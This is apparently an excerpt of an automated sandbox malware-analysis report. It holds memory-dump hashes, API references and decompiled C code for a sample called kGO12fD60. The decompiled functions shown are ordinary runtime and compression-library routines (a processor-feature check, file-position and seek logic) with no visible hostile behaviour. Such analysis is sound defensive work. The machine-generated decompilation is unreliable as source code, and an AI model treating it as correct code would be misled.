                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 4271482742-0
                                                                                                                                                                                                        • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                        • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 65%
                                                                                                                                                                                                        			E00413610() {
                                                                                                                                                                                                        				signed long long _v12;
                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                        				signed long long _v28;
                                                                                                                                                                                                        				signed char _t8;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t8 = GetModuleHandleA("KERNEL32");
                                                                                                                                                                                                        				if(_t8 == 0) {
                                                                                                                                                                                                        					L6:
                                                                                                                                                                                                        					_v20 =  *0x41fb50;
                                                                                                                                                                                                        					_v28 =  *0x41fb48;
                                                                                                                                                                                                        					asm("fsubr qword [ebp-0x18]");
                                                                                                                                                                                                        					_v12 = _v28 / _v20 * _v20;
                                                                                                                                                                                                        					asm("fld1");
                                                                                                                                                                                                        					asm("fcomp qword [ebp-0x8]");
                                                                                                                                                                                                        					asm("fnstsw ax");
                                                                                                                                                                                                        					if((_t8 & 0x00000005) != 0) {
                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						return 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                                                                                                                                                        					if(__eax == 0) {
                                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						return __eax;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                                                        • API String ID: 1646373207-3105848591
                                                                                                                                                                                                        • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                        • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E0040C748(void* __edx, void* __esi, char _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				signed int _t70;
                                                                                                                                                                                                        				signed int _t71;
                                                                                                                                                                                                        				intOrPtr _t73;
                                                                                                                                                                                                        				signed int _t75;
                                                                                                                                                                                                        				signed int _t81;
                                                                                                                                                                                                        				char _t82;
                                                                                                                                                                                                        				signed int _t84;
                                                                                                                                                                                                        				intOrPtr* _t86;
                                                                                                                                                                                                        				signed int _t87;
                                                                                                                                                                                                        				intOrPtr* _t90;
                                                                                                                                                                                                        				signed int _t92;
                                                                                                                                                                                                        				signed int _t94;
                                                                                                                                                                                                        				void* _t96;
                                                                                                                                                                                                        				signed char _t98;
                                                                                                                                                                                                        				signed int _t99;
                                                                                                                                                                                                        				intOrPtr _t102;
                                                                                                                                                                                                        				signed int _t103;
                                                                                                                                                                                                        				intOrPtr* _t104;
                                                                                                                                                                                                        				signed int _t111;
                                                                                                                                                                                                        				signed int _t114;
                                                                                                                                                                                                        				intOrPtr _t115;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t105 = __esi;
                                                                                                                                                                                                        				_t97 = __edx;
                                                                                                                                                                                                        				_t104 = _a4;
                                                                                                                                                                                                        				_t87 = 0;
                                                                                                                                                                                                        				_t121 = _t104;
                                                                                                                                                                                                        				if(_t104 != 0) {
                                                                                                                                                                                                        					_t70 = E0040FA20(__edx, _t104, _t104);
                                                                                                                                                                                                        					__eflags =  *(_t104 + 4);
                                                                                                                                                                                                        					_v8 = _t70;
                                                                                                                                                                                                        					if(__eflags < 0) {
                                                                                                                                                                                                        						 *(_t104 + 4) = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_push(1);
                                                                                                                                                                                                        					_push(_t87);
                                                                                                                                                                                                        					_push(_t70);
                                                                                                                                                                                                        					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
                                                                                                                                                                                                        					__eflags = _t71 - _t87;
                                                                                                                                                                                                        					_v12 = _t71;
                                                                                                                                                                                                        					if(_t71 < _t87) {
                                                                                                                                                                                                        						L2:
                                                                                                                                                                                                        						return _t71 | 0xffffffff;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t98 =  *(_t104 + 0xc);
                                                                                                                                                                                                        						__eflags = _t98 & 0x00000108;
                                                                                                                                                                                                        						if((_t98 & 0x00000108) != 0) {
                                                                                                                                                                                                        							_t73 =  *_t104;
                                                                                                                                                                                                        							_t92 =  *(_t104 + 8);
                                                                                                                                                                                                        							_push(_t105);
                                                                                                                                                                                                        							_v16 = _t73 - _t92;
                                                                                                                                                                                                        							__eflags = _t98 & 0x00000003;
                                                                                                                                                                                                        							if((_t98 & 0x00000003) == 0) {
                                                                                                                                                                                                        								__eflags = _t98;
                                                                                                                                                                                                        								if(__eflags < 0) {
                                                                                                                                                                                                        									L15:
                                                                                                                                                                                                        									__eflags = _v12 - _t87;
                                                                                                                                                                                                        									if(_v12 != _t87) {
                                                                                                                                                                                                        										__eflags =  *(_t104 + 0xc) & 0x00000001;
                                                                                                                                                                                                        										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
                                                                                                                                                                                                        											L40:
                                                                                                                                                                                                        											_t75 = _v16 + _v12;
                                                                                                                                                                                                        											__eflags = _t75;
                                                                                                                                                                                                        											L41:
                                                                                                                                                                                                        											return _t75;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t99 =  *(_t104 + 4);
                                                                                                                                                                                                        										__eflags = _t99 - _t87;
                                                                                                                                                                                                        										if(_t99 != _t87) {
                                                                                                                                                                                                        											_t90 = 0x423f60 + (_v8 >> 5) * 4;
                                                                                                                                                                                                        											_a4 = _t73 - _t92 + _t99;
                                                                                                                                                                                                        											_t111 = (_v8 & 0x0000001f) << 6;
                                                                                                                                                                                                        											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
                                                                                                                                                                                                        											if(__eflags == 0) {
                                                                                                                                                                                                        												L39:
                                                                                                                                                                                                        												_t66 =  &_v12;
                                                                                                                                                                                                        												 *_t66 = _v12 - _a4;
                                                                                                                                                                                                        												__eflags =  *_t66;
                                                                                                                                                                                                        												goto L40;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_push(2);
                                                                                                                                                                                                        											_push(0);
                                                                                                                                                                                                        											_push(_v8);
                                                                                                                                                                                                        											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
                                                                                                                                                                                                        											if(__eflags != 0) {
                                                                                                                                                                                                        												_push(0);
                                                                                                                                                                                                        												_push(_v12);
                                                                                                                                                                                                        												_push(_v8);
                                                                                                                                                                                                        												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
                                                                                                                                                                                                        												__eflags = _t81;
                                                                                                                                                                                                        												if(_t81 >= 0) {
                                                                                                                                                                                                        													_t82 = 0x200;
                                                                                                                                                                                                        													__eflags = _a4 - 0x200;
                                                                                                                                                                                                        													if(_a4 > 0x200) {
                                                                                                                                                                                                        														L35:
                                                                                                                                                                                                        														_t82 =  *((intOrPtr*)(_t104 + 0x18));
                                                                                                                                                                                                        														L36:
                                                                                                                                                                                                        														_a4 = _t82;
                                                                                                                                                                                                        														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
                                                                                                                                                                                                        														L37:
                                                                                                                                                                                                        														if(__eflags != 0) {
                                                                                                                                                                                                        															_t63 =  &_a4;
                                                                                                                                                                                                        															 *_t63 = _a4 + 1;
                                                                                                                                                                                                        															__eflags =  *_t63;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														goto L39;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													_t94 =  *(_t104 + 0xc);
                                                                                                                                                                                                        													__eflags = _t94 & 0x00000008;
                                                                                                                                                                                                        													if((_t94 & 0x00000008) == 0) {
                                                                                                                                                                                                        														goto L35;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													__eflags = _t94 & 0x00000400;
                                                                                                                                                                                                        													if((_t94 & 0x00000400) == 0) {
                                                                                                                                                                                                        														goto L36;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													goto L35;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												L31:
                                                                                                                                                                                                        												_t75 = _t81 | 0xffffffff;
                                                                                                                                                                                                        												goto L41;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t84 =  *(_t104 + 8);
                                                                                                                                                                                                        											_t96 = _a4 + _t84;
                                                                                                                                                                                                        											while(1) {
                                                                                                                                                                                                        												__eflags = _t84 - _t96;
                                                                                                                                                                                                        												if(_t84 >= _t96) {
                                                                                                                                                                                                        													break;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												__eflags =  *_t84 - 0xa;
                                                                                                                                                                                                        												if( *_t84 == 0xa) {
                                                                                                                                                                                                        													_t44 =  &_a4;
                                                                                                                                                                                                        													 *_t44 = _a4 + 1;
                                                                                                                                                                                                        													__eflags =  *_t44;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t84 = _t84 + 1;
                                                                                                                                                                                                        												__eflags = _t84;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags =  *(_t104 + 0xc) & 0x00002000;
                                                                                                                                                                                                        											goto L37;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_v16 = _t87;
                                                                                                                                                                                                        										goto L40;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t75 = _v16;
                                                                                                                                                                                                        									goto L41;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t81 = E0040BFC1(__eflags);
                                                                                                                                                                                                        								 *_t81 = 0x16;
                                                                                                                                                                                                        								goto L31;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
                                                                                                                                                                                                        							_t114 = (_v8 & 0x0000001f) << 6;
                                                                                                                                                                                                        							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
                                                                                                                                                                                                        							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
                                                                                                                                                                                                        								goto L15;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t103 = _t92;
                                                                                                                                                                                                        							__eflags = _t103 - _t73;
                                                                                                                                                                                                        							if(_t103 >= _t73) {
                                                                                                                                                                                                        								goto L15;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t115 = _t73;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								__eflags =  *_t103 - 0xa;
                                                                                                                                                                                                        								if( *_t103 == 0xa) {
                                                                                                                                                                                                        									_v16 = _v16 + 1;
                                                                                                                                                                                                        									_t87 = 0;
                                                                                                                                                                                                        									__eflags = 0;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t103 = _t103 + 1;
                                                                                                                                                                                                        								__eflags = _t103 - _t115;
                                                                                                                                                                                                        							} while (_t103 < _t115);
                                                                                                                                                                                                        							goto L15;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						return _t71 -  *(_t104 + 4);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t86 = E0040BFC1(_t121);
                                                                                                                                                                                                        				_push(0);
                                                                                                                                                                                                        				_push(0);
                                                                                                                                                                                                        				_push(0);
                                                                                                                                                                                                        				_push(0);
                                                                                                                                                                                                        				_push(0);
                                                                                                                                                                                                        				 *_t86 = 0x16;
                                                                                                                                                                                                        				_t71 = E0040E744(__edx, _t104, __esi);
                                                                                                                                                                                                        				goto L2;
                                                                                                                                                                                                        			}






























                                                                                                                                                                                                        0x0040c8d5
                                                                                                                                                                                                        0x0040c8d5
                                                                                                                                                                                                        0x0040c8d5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c8d5
                                                                                                                                                                                                        0x0040c859
                                                                                                                                                                                                        0x0040c85b
                                                                                                                                                                                                        0x0040c85d
                                                                                                                                                                                                        0x0040c868
                                                                                                                                                                                                        0x0040c86b
                                                                                                                                                                                                        0x0040c88d
                                                                                                                                                                                                        0x0040c88f
                                                                                                                                                                                                        0x0040c892
                                                                                                                                                                                                        0x0040c895
                                                                                                                                                                                                        0x0040c89d
                                                                                                                                                                                                        0x0040c89f
                                                                                                                                                                                                        0x0040c8a6
                                                                                                                                                                                                        0x0040c8ab
                                                                                                                                                                                                        0x0040c8ae
                                                                                                                                                                                                        0x0040c8c0
                                                                                                                                                                                                        0x0040c8c0
                                                                                                                                                                                                        0x0040c8c3
                                                                                                                                                                                                        0x0040c8c3
                                                                                                                                                                                                        0x0040c8c8
                                                                                                                                                                                                        0x0040c8cd
                                                                                                                                                                                                        0x0040c8cd
                                                                                                                                                                                                        0x0040c8cf
                                                                                                                                                                                                        0x0040c8cf
                                                                                                                                                                                                        0x0040c8cf
                                                                                                                                                                                                        0x0040c8cf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c8cd
                                                                                                                                                                                                        0x0040c8b0
                                                                                                                                                                                                        0x0040c8b3
                                                                                                                                                                                                        0x0040c8b6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c8b8
                                                                                                                                                                                                        0x0040c8be
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c8be
                                                                                                                                                                                                        0x0040c8a1
                                                                                                                                                                                                        0x0040c8a1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c8a1
                                                                                                                                                                                                        0x0040c86d
                                                                                                                                                                                                        0x0040c873
                                                                                                                                                                                                        0x0040c880
                                                                                                                                                                                                        0x0040c880
                                                                                                                                                                                                        0x0040c882
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c877
                                                                                                                                                                                                        0x0040c87a
                                                                                                                                                                                                        0x0040c87c
                                                                                                                                                                                                        0x0040c87c
                                                                                                                                                                                                        0x0040c87c
                                                                                                                                                                                                        0x0040c87c
                                                                                                                                                                                                        0x0040c87f
                                                                                                                                                                                                        0x0040c87f
                                                                                                                                                                                                        0x0040c87f
                                                                                                                                                                                                        0x0040c884
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c884
                                                                                                                                                                                                        0x0040c82b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c82b
                                                                                                                                                                                                        0x0040c7fe
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c7fe
                                                                                                                                                                                                        0x0040c80a
                                                                                                                                                                                                        0x0040c80f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c80f
                                                                                                                                                                                                        0x0040c7ce
                                                                                                                                                                                                        0x0040c7d8
                                                                                                                                                                                                        0x0040c7db
                                                                                                                                                                                                        0x0040c7e0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c7e2
                                                                                                                                                                                                        0x0040c7e4
                                                                                                                                                                                                        0x0040c7e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c7e8
                                                                                                                                                                                                        0x0040c7ea
                                                                                                                                                                                                        0x0040c7ea
                                                                                                                                                                                                        0x0040c7ed
                                                                                                                                                                                                        0x0040c7ef
                                                                                                                                                                                                        0x0040c7f2
                                                                                                                                                                                                        0x0040c7f2
                                                                                                                                                                                                        0x0040c7f2
                                                                                                                                                                                                        0x0040c7f4
                                                                                                                                                                                                        0x0040c7f5
                                                                                                                                                                                                        0x0040c7f5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c7ea
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c7ab
                                                                                                                                                                                                        0x0040c79e
                                                                                                                                                                                                        0x0040c75b
                                                                                                                                                                                                        0x0040c760
                                                                                                                                                                                                        0x0040c761
                                                                                                                                                                                                        0x0040c762
                                                                                                                                                                                                        0x0040c763
                                                                                                                                                                                                        0x0040c764
                                                                                                                                                                                                        0x0040c765
                                                                                                                                                                                                        0x0040c76b
                                                                                                                                                                                                        0x00000000

APIs
• __fileno.LIBCMT ref: 0040C77C
• __locking.LIBCMT ref: 0040C791
  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
Memory Dump Source
• Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
Yara matches
Similarity
• API ID: __decode_pointer__fileno__getptd_noexit__locking
• String ID:
• API String ID: 2395185920-0
• Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
• Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
• Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
• Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 97%
                                                                                                                                                                                                        			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t30;
                                                                                                                                                                                                        				signed int _t31;
                                                                                                                                                                                                        				signed int _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                                        				void* _t42;
                                                                                                                                                                                                        				intOrPtr _t43;
                                                                                                                                                                                                        				void* _t45;
                                                                                                                                                                                                        				signed int _t48;
                                                                                                                                                                                                        				signed int* _t53;
                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                        				void* _t55;
                                                                                                                                                                                                        				void* _t57;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t54 = __ebp;
                                                                                                                                                                                                        				_t45 = __edx;
                                                                                                                                                                                                        				_t42 = __ebx;
                                                                                                                                                                                                        				_t53 = _a4;
                                                                                                                                                                                                        				if(_t53 == 0) {
                                                                                                                                                                                                        					L40:
                                                                                                                                                                                                        					_t31 = _t30 | 0xffffffff;
                                                                                                                                                                                                        					__eflags = _t31;
                                                                                                                                                                                                        					return _t31;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t43 = _a12;
                                                                                                                                                                                                        					if(_t43 == 2) {
                                                                                                                                                                                                        						goto L40;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t30 = _t53[0xe];
                                                                                                                                                                                                        						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
                                                                                                                                                                                                        							goto L40;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t48 = _a8;
                                                                                                                                                                                                        							if(_t53[0x17] != 0x77) {
                                                                                                                                                                                                        								__eflags = _t43 - 1;
                                                                                                                                                                                                        								if(_t43 == 1) {
                                                                                                                                                                                                        									_t48 = _t48 + _t53[0x1a];
                                                                                                                                                                                                        									__eflags = _t48;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								__eflags = _t48;
                                                                                                                                                                                                        								if(_t48 < 0) {
                                                                                                                                                                                                        									goto L39;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									__eflags = _t53[0x16];
                                                                                                                                                                                                        									if(__eflags == 0) {
                                                                                                                                                                                                        										_t33 = _t53[0x1a];
                                                                                                                                                                                                        										__eflags = _t48 - _t33;
                                                                                                                                                                                                        										if(_t48 < _t33) {
                                                                                                                                                                                                        											_t30 = E004054F0(_t42, _t54, _t53);
                                                                                                                                                                                                        											_t55 = _t55 + 4;
                                                                                                                                                                                                        											__eflags = _t30;
                                                                                                                                                                                                        											if(_t30 < 0) {
                                                                                                                                                                                                        												goto L39;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												goto L27;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t48 = _t48 - _t33;
                                                                                                                                                                                                        											L27:
                                                                                                                                                                                                        											__eflags = _t48;
                                                                                                                                                                                                        											if(_t48 == 0) {
                                                                                                                                                                                                        												L38:
                                                                                                                                                                                                        												return _t53[0x1a];
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												__eflags = _t53[0x12];
                                                                                                                                                                                                        												if(_t53[0x12] != 0) {
                                                                                                                                                                                                        													L30:
                                                                                                                                                                                                        													__eflags = _t53[0x1b] - 0xffffffff;
                                                                                                                                                                                                        													if(_t53[0x1b] != 0xffffffff) {
                                                                                                                                                                                                        														_t53[0x1a] = _t53[0x1a] + 1;
                                                                                                                                                                                                        														_t48 = _t48 - 1;
                                                                                                                                                                                                        														__eflags = _t53[0x1c];
                                                                                                                                                                                                        														_t53[0x1b] = 0xffffffff;
                                                                                                                                                                                                        														if(_t53[0x1c] != 0) {
                                                                                                                                                                                                        															_t53[0xe] = 1;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													__eflags = _t48;
                                                                                                                                                                                                        													if(_t48 <= 0) {
                                                                                                                                                                                                        														goto L38;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														while(1) {
                                                                                                                                                                                                        															_t35 = 0x4000;
                                                                                                                                                                                                        															__eflags = _t48 - 0x4000;
                                                                                                                                                                                                        															if(_t48 < 0x4000) {
                                                                                                                                                                                                        																_t35 = _t48;
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
                                                                                                                                                                                                        															_t55 = _t55 + 0xc;
                                                                                                                                                                                                        															__eflags = _t30;
                                                                                                                                                                                                        															if(_t30 <= 0) {
                                                                                                                                                                                                        																goto L39;
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        															_t48 = _t48 - _t30;
                                                                                                                                                                                                        															__eflags = _t48;
                                                                                                                                                                                                        															if(_t48 > 0) {
                                                                                                                                                                                                        																continue;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																goto L38;
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        															goto L41;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														goto L39;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                                                                                                                                                                        													_t55 = _t55 + 4;
                                                                                                                                                                                                        													_t53[0x12] = _t30;
                                                                                                                                                                                                        													__eflags = _t30;
                                                                                                                                                                                                        													if(_t30 == 0) {
                                                                                                                                                                                                        														goto L39;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L30;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_push(0);
                                                                                                                                                                                                        										_push(_t48);
                                                                                                                                                                                                        										_push(_t53[0x10]);
                                                                                                                                                                                                        										_t53[0x1b] = 0xffffffff;
                                                                                                                                                                                                        										_t53[1] = 0;
                                                                                                                                                                                                        										 *_t53 = _t53[0x11];
                                                                                                                                                                                                        										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
                                                                                                                                                                                                        										__eflags = _t30;
                                                                                                                                                                                                        										if(_t30 < 0) {
                                                                                                                                                                                                        											goto L39;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t53[0x1a] = _t48;
                                                                                                                                                                                                        											_t53[0x19] = _t48;
                                                                                                                                                                                                        											return _t48;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								if(_t43 == 0) {
                                                                                                                                                                                                        									_t48 = _t48 - _t53[0x19];
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								if(_t48 < 0) {
                                                                                                                                                                                                        									L39:
                                                                                                                                                                                                        									_t32 = _t30 | 0xffffffff;
                                                                                                                                                                                                        									__eflags = _t32;
                                                                                                                                                                                                        									return _t32;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									if(_t53[0x11] != 0) {
                                                                                                                                                                                                        										L11:
                                                                                                                                                                                                        										if(_t48 <= 0) {
                                                                                                                                                                                                        											L17:
                                                                                                                                                                                                        											return _t53[0x19];
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											while(1) {
                                                                                                                                                                                                        												_t39 = 0x4000;
                                                                                                                                                                                                        												if(_t48 < 0x4000) {
                                                                                                                                                                                                        													_t39 = _t48;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
                                                                                                                                                                                                        												_t55 = _t55 + 0xc;
                                                                                                                                                                                                        												if(_t30 == 0) {
                                                                                                                                                                                                        													goto L39;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t48 = _t48 - _t30;
                                                                                                                                                                                                        												if(_t48 > 0) {
                                                                                                                                                                                                        													continue;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													goto L17;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L41;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											goto L39;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                                                                                                                                                                        										_t57 = _t55 + 4;
                                                                                                                                                                                                        										_t53[0x11] = _t30;
                                                                                                                                                                                                        										if(_t30 == 0) {
                                                                                                                                                                                                        											goto L39;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											E0040BA30(_t48, _t30, 0, 0x4000);
                                                                                                                                                                                                        											_t55 = _t57 + 0xc;
                                                                                                                                                                                                        											goto L11;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L41:
                                                                                                                                                                                                        			}



















